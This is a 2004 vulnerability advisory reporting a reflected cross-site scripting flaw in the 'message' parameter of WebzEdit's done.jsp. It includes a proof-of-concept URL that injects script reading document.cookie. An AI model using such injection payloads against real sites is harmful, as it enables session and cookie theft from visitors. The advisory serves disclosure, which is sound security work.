Title:Cross Site Scripting in WebzEdit Release Date: Feb 22,2004 Application: WebzEdit Version Affected: 1.9 or lower Platform: JSP Severity: Low Discover: Cheng Peng Su(apple_soup[at]msn.com) Vendor URL: http://www.freewebs.com/ ################################################ Intro: WebzEdit is a tool to edit web page online. Proof Of Concept: This page (http://host/WebzEdit/done.jsp?message=index.htm%20has%20been%20saved.) will show you a Message box with "index.htm has been saved." , and the [done.jsp] doesn't filter out illegal characters. So here is a XSS vuln: URL:http://host/WebzEdit/done.jsp?message=');[XSS code];a=escape(' Exploit: URL:http://host/WebzEdit/done.jsp?message=');alert(document.cookie);a=escape(' ---------------------------------------------------------- Cheng Peng Su Class 1,Senior 2,High school attached to Wuhan University, Wuhan,Hubei,China email:apple_soup[at]msn.com
